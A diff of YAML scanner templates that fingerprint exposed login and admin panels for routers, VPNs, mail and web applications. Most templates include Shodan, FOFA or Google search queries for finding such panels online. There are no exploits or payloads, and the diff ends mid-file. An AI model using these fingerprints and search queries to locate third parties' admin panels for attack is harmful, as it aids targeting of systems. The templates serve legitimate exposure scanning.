- '(?i)Set-Cookie: XSRF-TOKEN=([A-Za-z0-9_.-]+)'

9
exposed-panels/apache-jmeter-dashboard.yaml
View File

@ -1,9 +1,14 @@
id: apache-jmeter-dashboard
info:
name: Apache JMeter Dashboard
name: Apache JMeter Dashboard Login Panel - Detect
author: tess
severity: low
description: Apache JMeter Dashboard login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Apache JMeter Dashboard"
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/apache/public-tomcat-manager.yaml
View File

@ -1,11 +1,13 @@
id: public-tomcat-manager
info:
name: Apache Tomcat Manager Disclosure
name: Apache Tomcat Manager Login Panel - Detect
author: Ahmed Sherif,geeknik,sinKettu
severity: info
description: An Apache Tomcat Manager panel was discovered.
description: Apache Tomcat Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: title:"Apache Tomcat"
@ -20,6 +22,7 @@ requests:
matchers-condition: and
matchers:
- type: word
part: response
words:
- "Apache Tomcat"
- "Tomcat Manager"
@ -30,3 +33,5 @@ requests:
- 401
- 200
condition: or
# Enhanced by md on 2022/11/28

27
exposed-panels/asus-router-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: asus-router-panel
info:
name: Asus Router Login Panel
author: arafatansari
severity: info
metadata:
verified: true
shodan-query: 'Server: httpd/2.0 port:8080'
tags: panel,asus,router,iot
requests:
- method: GET
path:
- "{{BaseURL}}/Main_Login.asp"
matchers-condition: and
matchers:
- type: word
words:
- '<title>ASUS Login</title>'
- 'Sign in with your ASUS router account'
condition: or
- type: status
status:
- 200

25
exposed-panels/backpack/backpack-admin-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: backpack-admin-panel
info:
name: Backpack Admin Login Panel
author: shine
severity: info
description: |
An Backpack Admin dashboard was detected.
metadata:
verified: true
shodan-query: title:"Backpack Admin"
tags: panel,backpack,admin
requests:
- method: GET
path:
- "{{BaseURL}}/admin/login"
matchers:
- type: word
part: body
words:
- 'Backpack Admin'
- 'backpack_alerts'
condition: or

40
exposed-panels/cisco/cisco-webvpn-detect.yaml Normal file
View File

@ -0,0 +1,40 @@
id: cisco-webvpn-detect
info:
name: Cisco WebVPN Detect
author: ricardomaia
severity: info
reference:
- https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/
metadata:
verified: true
fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg=="
google-query: intitle:"SSLVPN Service"
tags: panel,cisco,vpn
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/webvpn.html"
host-redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CISCO"
- "AnyConnect"
- "SSLVPN Service"
condition: or
case-insensitive: true
- type: regex
part: header
regex:
- "webvpncontext=00@.+"
- "webvpn="
condition: or

27
exposed-panels/cudatel-panel.yaml Normal file
View File

@ -0,0 +1,27 @@
id: cudatel-panel
info:
name: CudaTel Login Panel
author: arafatansari
severity: info
metadata:
verified: true
shodan-query: title:"CudaTel"
tags: panel,cudatel
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- 'CudaTel Communications Server'
- 'alt="CudaTel'
condition: or
- type: status
status:
- 200

9
exposed-panels/dplus-dashboard.yaml
View File

@ -1,9 +1,14 @@
id: dplus-dashboard
info:
name: DPLUS Dashboard Exposure
name: DPLUS Dashboard Panel - Detect
author: tess
severity: info
description: DPLUS Dashboard panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"DPLUS Dashboard"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

4
exposed-panels/dqs-superadmin.yaml → exposed-panels/dqs-superadmin-panel.yaml
View File

@ -1,7 +1,7 @@
id: dqs-superadmin
id: dqs-superadmin-panel
info:
name: DQS Superadmin
name: DQS Superadmin Login Panel
author: Hardik-Solanki
severity: info
metadata:

28
exposed-panels/dradis-pro-panel.yaml Normal file
View File

@ -0,0 +1,28 @@
id: dradis-pro-panel
info:
name: Dradis Professional Edition Panel
author: righettod
severity: info
reference:
- https://dradisframework.com/ce/
metadata:
verified: true
shodan-query: title:"Dradis Professional Edition"
tags: panel,dradis
requests:
- method: GET
path:
- "{{BaseURL}}/pro/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Dradis Professional Edition"
- type: status
status:
- 200

9
exposed-panels/exolis-engage-panel.yaml
View File

@ -1,11 +1,16 @@
id: exolis-engage-panel
info:
name: Exolis Engage Panel
name: Exolis Engage Panel - Detect
author: righettod
description: Exolis Engage panel was detected.
severity: info
reference:
- https://www.exolis.fr/en/solution-2/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"engage - Portail soignant"
@ -33,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/29

9
exposed-panels/fastpanel-hosting-control-panel.yaml
View File

@ -1,9 +1,14 @@
id: fastpanel-hosting-control-panel
info:
name: Fastpanel Hosting Control Panel
name: FASTPANEL Login Panel - Detect
author: pikpikcu
severity: info
description: FASTPANEL login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"FASTPANEL HOSTING CONTROL"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

4
flahscookie-superadmin.yaml → exposed-panels/flahscookie-superadmin-panel.yaml
View File

@ -1,7 +1,7 @@
id: flahscookie-superadmin
id: flahscookie-superadmin-panel
info:
name: Flahscookie Superadmin
name: Flahscookie Superadmin Login
author: Hardik-Solanki
severity: info
metadata:

4
technologies/influxdb-detect.yaml → exposed-panels/influxdb-panel.yaml
View File

@ -1,4 +1,4 @@
id: influxdb-detect
id: influxdb-panel
info:
name: InfluxDB Detect
@ -9,7 +9,7 @@ info:
- https://www.influxdata.com/
metadata:
shodan-query: http.title:"InfluxDB - Admin Interface"
tags: tech,influxdb
tags: panel,influxdb
requests:
- method: GET

9
exposed-panels/lacie-panel.yaml
View File

@ -1,11 +1,16 @@
id: lacie-panel
info:
name: LaCie Login Panel
name: LaCie Login Panel - Detect
author: dhiyaneshDK
severity: info
description: LaCie login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/7118
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,lacie,login,edb
requests:
@ -29,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/lancom-router-panel.yaml
View File

@ -1,9 +1,14 @@
id: lancom-router-panel
info:
name: Lancom Router Panel
name: Lancom Router Login Panel - Detect
author: __Fazal,daffainfo
severity: info
description: Lancom router login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: "true"
shodan-query: html:"LANCOM Systems GmbH"
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

11
exposed-panels/landrayoa-panel.yaml
View File

@ -1,9 +1,14 @@
id: landrayoa-panel
info:
name: LandrayOA Panel Login
name: Landray Login Panel - Detect
author: YanYun
severity: info
description: Landray login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,landrayoa
requests:
@ -27,4 +32,6 @@ requests:
- type: word
words:
- 'isopen='
part: header
part: header
# Enhanced by md on 2022/11/28

9
exposed-panels/lansweeper-login.yaml
View File

@ -1,9 +1,14 @@
id: lansweeper-login
info:
name: Lansweeper Login
name: Lansweeper Login Panel - Detect
author: divya_mudgal
severity: info
description: Lansweeper login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Lansweeper - Login"
@ -31,3 +36,5 @@ requests:
group: 1
regex:
- '"\/js\/CustomControls\.js\?([0-9.]+)" type="text\/javascript"'
# Enhanced by md on 2022/11/28

9
exposed-panels/lantronix-webmanager-panel.yaml
View File

@ -1,9 +1,14 @@
id: lantronix-webmanager-panel
info:
name: Lantronix WEB-Manager Panel
name: Lantronix Web Manager Login Panel- Detect
author: princechaddha
severity: info
description: Lantronix Web Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,lantronix
requests:
@ -29,3 +34,5 @@ requests:
group: 1
regex:
- ">Version ([0-9.]+)</font>"
# Enhanced by md on 2022/11/28

9
exposed-panels/lenovo-thinkserver-panel.yaml
View File

@ -1,9 +1,14 @@
id: lenovo-thinkserver-panel
info:
name: Lenovo ThinkServer System Manager Panel Detect
name: Lenovo ThinkServer System Manager Login Panel - Detect
author: princechaddha
severity: info
description: Lenovo ThinkServer System Manager login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,thinkserver,lenovo
requests:
@ -21,3 +26,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/leostream-panel.yaml
View File

@ -1,11 +1,16 @@
id: leostream-panel
info:
name: Leostream Panel Detect
name: Leostream Login Panel - Detect
author: praetorian-thendrickson
severity: info
description: Leostream login panel was detected.
reference:
- https://leostream.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Leostream"
tags: panel,leostream
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/librenms-login.yaml
View File

@ -1,9 +1,14 @@
id: librenms-login
info:
name: LibreNMS Login Panel
name: LibreNMS Login Panel - Detect
author: pikpikcu
severity: info
description: LibreNMS login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
fofa-query: title="librenms"
tags: librenms,panel
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/liferay-portal.yaml
View File

@ -1,12 +1,17 @@
id: liferay-portal
info:
name: Liferay Portal Detect
name: Liferay Login Panel - Detect
author: organiccrap,dwisiswant0,ricardomaia
severity: info
description: Liferay login panel was detected,
reference:
- https://www.liferay.com/
- https://github.com/mzer0one/CVE-2020-7961-POC
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.favicon.hash:129457226
@ -43,3 +48,5 @@ requests:
group: 2
regex:
- '(i?)Liferay-Portal:.*?(\d+\.?.*?)\s'
# Enhanced by md on 2022/11/28

10
exposed-panels/linkerd-panel.yaml
View File

@ -1,11 +1,15 @@
id: linkerd-panel
info:
name: Linkered Panel Exposure
name: Linkerd Panel - Detect
author: tess
severity: high
description: |
Linkerd is a service mesh for Kubernetes. It makes running services easier and safer by giving you runtime debugging, observability, reliability, and security—all without requiring any changes to your code.
Linkerd panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"data-controller-namespace"
@ -33,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/linksys-wifi-login.yaml
View File

@ -1,9 +1,14 @@
id: linksys-wifi-login
info:
name: Linksys Smart Wi-Fi
name: Linksys Smart Wi-Fi Login Panel - Detect
author: pussycat0x
severity: info
description: Linksys Smart Wi-Fi login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-dork: http.title:"Linksys Smart WI-FI"
tags: tech,panel,linksys,iot
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/livehelperchat-admin-panel.yaml
View File

@ -1,9 +1,14 @@
id: livehelperchat-admin-panel
info:
name: Live Helper Chat Admin Panel
name: Live Helper Chat Admin Login Panel - Detect
author: ritikchaddha
severity: info
description: Live Helper Chat admin login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: title:"Live Helper Chat"
@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/livezilla-login-panel.yaml
View File

@ -1,9 +1,14 @@
id: livezilla-login-panel
info:
name: Livezilla login detect
name: LiveZilla Login Panel - Detect
author: __Fazal
severity: info
description: LiveZilla login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,livezilla,login
requests:
@ -20,3 +25,5 @@ requests:
- type: word
words:
- 'LiveZilla'
# Enhanced by md on 2022/11/28

40
exposed-panels/locklizard-webviewer-panel.yaml Normal file
View File

@ -0,0 +1,40 @@
id: locklizard-webviewer-panel
info:
name: Locklizard Web Viewer Login Panel - Detect
author: righettod
severity: info
description: Locklizard Web Viewer login panel was detected.
reference:
- https://www.locklizard.com/pdf_security_webviewer/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: html:"Locklizard Web Viewer"
tags: panel,locklizard,webviewer
requests:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Locklizard Web Viewer'
- 'Did you remember your password?'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/11/29

9
exposed-panels/logitech-harmony-portal.yaml
View File

@ -1,9 +1,14 @@
id: logitech-harmony-portal
info:
name: Logitech Harmony Pro Installer Portal
name: Logitech Harmony Pro Installer Portal Login Panel - Detect
author: ritikchaddha
severity: info
description: Logitech Harmony Pro Installer Portal login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"Logitech Harmony Pro Installer"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/looker-panel.yaml
View File

@ -1,9 +1,14 @@
id: looker-panel
info:
name: Looker Login Panel
name: Looker Login Panel - Detect
author: ritikchaddha,daffainfo
severity: info
description: Looker login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan: http.html:"lookerVersion"
@ -32,3 +37,5 @@ requests:
group: 1
regex:
- "lookerVersion: '([0-9.]+)',"
# Enhanced by md on 2022/11/28

9
exposed-panels/lucee-login.yaml
View File

@ -1,9 +1,14 @@
id: lucee-login
info:
name: Lucee Web/Server Administrator Login
name: Lucee Web and Lucee Server Admin Login Panel - Detect
author: dhiyaneshDK
severity: info
description: Lucee admin login panels were detected in both Web and Server tabs.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Lucee"
tags: panel,lucee
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

10
exposed-panels/mach-proweb-login.yaml
View File

@ -1,13 +1,17 @@
id: mach-proweb-login
info:
name: MACH-ProWeb Login Panel
name: MACH-ProWeb Login Panel - Detect
author: Jaskaran
severity: info
description: |
MACH-ProWeb is building controller system used to access and control respective facilities easily
MACH-ProWeb login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/8023
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
google-query: intitle:"Log on to MACH-ProWeb"
@ -28,3 +32,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/29

9
exposed-panels/maestro-login-panel.yaml
View File

@ -1,9 +1,14 @@
id: maestro-login-panel
info:
name: Maestro - LuCI Login Panel
name: Maestro LuCI Login Panel - Detect
author: tess
severity: info
description: Maestro LuCI login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-dork: http.title:"Maestro - LuCI"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

11
exposed-panels/magento-admin-panel.yaml
View File

@ -1,14 +1,17 @@
id: magento-admin-panel
info:
name: Exposed Magento Admin Panel
name: Magento Admin Login Panel - Detect
author: TechbrunchFR,ritikchaddha
severity: info
description: |
As a security best practice, Magento recommends that you use a unique, custom Admin URL instead of the default admin or a common term such as backend. Although it will not directly protect your site
from a determined bad actor, it can reduce exposure to scripts that try to gain unauthorized access.
Magento admin login panel was detected.
reference:
- https://docs.magento.com/user-guide/stores/store-urls-custom-admin.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.component:"Magento"
@ -30,3 +33,5 @@ requests:
- "Magento"
- "Admin Panel"
condition: and
# Enhanced by md on 2022/11/28

10
exposed-panels/mailhog-panel.yaml
View File

@ -1,13 +1,17 @@
id: mailhog-panel
info:
name: MailHog Panel Detect
name: MailHog Panel - Detect
author: kh4sh3i
severity: info
description: |
MailHog is an email testing tool for developers
MailHog panel was detected.
reference:
- https://github.com/mailhog/MailHog
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"mailhog"
@ -30,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/mailwatch-login.yaml
View File

@ -1,9 +1,14 @@
id: mailwatch-login
info:
name: MailWatch Login Page
name: MailWatch Login Panel - Detect
author: oppsec
severity: info
description: MailWatch login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"MailWatch Login Page"
@ -26,3 +31,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/mantisbt-panel.yaml
View File

@ -1,11 +1,16 @@
id: mantisbt-panel
info:
name: MantisBT Login Panel
name: MantisBT Login Panel - Detect
author: makyotox,daffainfo
severity: info
description: MantisBT login panel was detected.
reference:
- https://www.mantisbt.org/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.favicon.hash:662709064
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

12
exposed-panels/matomo-login-portal.yaml
View File

@ -1,10 +1,14 @@
id: matomo-login-portal
info:
name: Matomo Login Portal
name: Matomo Login Panel - Detect
author: Arr0way
severity: info
description: Matomo provides website analytics
description: Matomo logjn panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,matomo
requests:
@ -22,4 +26,6 @@ requests:
words:
- "Sign in"
- "Matomo"
condition: and
condition: and
# Enhanced by md on 2022/11/28

9
exposed-panels/mcloud-panel.yaml
View File

@ -1,9 +1,14 @@
id: mcloud-panel
info:
name: MCloud Panel Exposure
name: mCloud Login Panel - Detect
author: ritikchaddha
severity: high
description: mCloud login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.title:"mcloud-installer-web"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/meshcentral-login.yaml
View File

@ -1,9 +1,14 @@
id: meshcentral-login
info:
name: MeshCentral - Login
name: MeshCentral Login Panel - Detect
author: dhiyaneshDk
severity: info
description: MeshCentral login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"MeshCentral - Login"
tags: panel,meshcentral
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

10
exposed-panels/metabase-panel.yaml
View File

@ -1,10 +1,14 @@
id: metabase-panel
info:
name: Metabase Login Panel
name: Metabase Login Panel - Detect
author: revblock,daffainfo
severity: info
description: If a Metabase instance is deployed on the target URL it will return a login page with the version number in the page source
description: Metabase login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: http.title:"Metabase"
tags: panel,metabase,login
@ -34,3 +38,5 @@ requests:
group: 1
regex:
- '"(v\d+.\d+.\d+)"'
# Enhanced by md on 2022/11/28

11
exposed-panels/metersphere-login.yaml
View File

@ -1,11 +1,16 @@
id: metersphere-login
info:
name: Metersphere Login
name: MeterSphere Login Panel - Detect
author: pdteam
severity: info
description: MeterSphere login panel was detected.
reference:
- https://github.com/metersphere/metersphere
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,metersphere
requests:
@ -32,4 +37,6 @@ requests:
- type: dsl
dsl:
- "contains(tolower(all_headers), 'ms_session_id')"
- "contains(tolower(all_headers), 'ms_session_id')"
# Enhanced by md on 2022/11/28

9
exposed-panels/mfiles-web-detect.yaml
View File

@ -1,11 +1,16 @@
id: mfiles-web-detect
info:
name: M-Files Web Panel Detect
name: M-Files Web Login Panel - Detect
author: Nodauf
severity: info
description: M-Files Web login panel was detected.
reference:
- https://www.m-files.com/about/trust-center/security-advisories/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"M-Files Web"
@ -31,3 +36,5 @@ requests:
- 'M-Files user'
- 'M-Files authentication'
condition: or
# Enhanced by md on 2022/11/28

9
exposed-panels/microfocus-filr-panel.yaml
View File

@ -1,9 +1,14 @@
id: microfocus-filr-panel
info:
name: Micro Focus Filr Panel
name: Micro Focus Filr Login Panel - Detect
author: ritikchaddha
severity: info
description: Micro Focus Filr login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"Micro Focus Filr"
@ -24,3 +29,5 @@ requests:
- type: status
status:
- 404
# Enhanced by md on 2022/11/28

9
exposed-panels/microfocus-vibe-panel.yaml
View File

@ -1,9 +1,14 @@
id: microfocus-vibe-panel
info:
name: Micro Focus Vibe Login Panel
name: Micro Focus Vibe Login Panel - Detect
author: ritikchaddha
severity: info
description: Micro Focus Vibe login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"Micro Focus Vibe"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

10
exposed-panels/microsoft-exchange-panel.yaml
View File

@ -1,12 +1,16 @@
id: microsoft-exchange-panel
info:
name: Microsoft Exchange Control Panel
name: Microsoft Exchange Admin Center Login Panel - Detect
author: r3dg33k
severity: info
description: Publicly accessible Microsoft Exchange Server Control Panel
description: Microsoft Exchange Admin Center login panel was detected.
reference:
- https://docs.microsoft.com/en-us/answers/questions/58814/block-microsoft-exchange-server-2016-exchange-admi.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: microsoft,panel,exchange
requests:
@ -23,3 +27,5 @@ requests:
- type: word
words:
- 'Exchange Admin Center'
# Enhanced by md on 2022/11/28

29
exposed-panels/mikrotik/mikrotik-routeros-old.yaml Normal file
View File

@ -0,0 +1,29 @@
id: mikrotik-routeros-old
info:
name: MikroTik RouterOS Administration Login
author: its0x08,DhiyaneshDk
severity: info
metadata:
verified: true
shodan-query: title:"mikrotik routeros > administration"
tags: panel,login,mikrotik
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
part: body
words:
- 'mikrotik routeros > administration'
- 'configuration page'
condition: and
extractors:
- type: regex
group: 1
regex:
- '<div class="top">mikrotik routeros (.[0-9.]+) configuration page</div>'

10
exposed-panels/mikrotik-routeros.yaml → exposed-panels/mikrotik/mikrotik-routeros.yaml
View File

@ -1,11 +1,16 @@
id: mikrotik-routeros
info:
name: MikroTik RouterOS Login
name: MikroTik Router OS - Login Panel Detect
author: gy741
severity: info
description: MikroTik Router OS login panel was detected.
reference:
- https://systemweakness.com/routeros-user-with-just-ftp-policy-can-write-to-filesystem-cve-2021-27221-e3e45d780dfe
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,login
requests:
@ -20,6 +25,9 @@ requests:
- 'If this device is not in your possession, please contact your local network administrator'
- '.mikrotik.com'
condition: and
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

9
exposed-panels/mini-start-page.yaml
View File

@ -1,11 +1,16 @@
id: mini-start-page
info:
name: Miniweb Start Page
name: Miniweb Start Page Login Panel - Detect
author: dhiyaneshDk
severity: info
description: Miniweb Start Page login panel was detected.
reference:
- https://www.exploit-db.com/ghdb/6500
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: edb,panel
requests:
@ -22,3 +27,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/28

11
exposed-panels/minio-browser.yaml
View File

@ -1,9 +1,14 @@
id: minio-browser
info:
name: MinIO Browser
name: MinIO Browser Login Panel - Detect
author: pikpikcu
severity: info
description: MinIO Browser login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
shodan-query: title:"MinIO Browser"
tags: panel,minio
@ -21,4 +26,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by md on 2022/11/28

11
exposed-panels/minio-console.yaml
View File

@ -1,9 +1,14 @@
id: minio-console
info:
name: MinIO Console
name: MinIO Console Login Panel - Detect
author: pussycat0x
severity: info
description: MinIO Console login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,minio
metadata:
fofa-query: app="MinIO-Console"
@ -23,4 +28,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by md on 2022/11/29

9
exposed-panels/mitel-panel-detect.yaml
View File

@ -1,9 +1,14 @@
id: mitel-panel-detect
info:
name: Mitel Panel Detect
name: Mitel Login Panel - Detect
author: ritikchaddha
severity: info
description: Mitel login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
shodan-query: http.html:"Mitel Networks"
@ -28,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/29

9
exposed-panels/mobile-management-panel.yaml
View File

@ -1,9 +1,14 @@
id: mobile-management-panel
info:
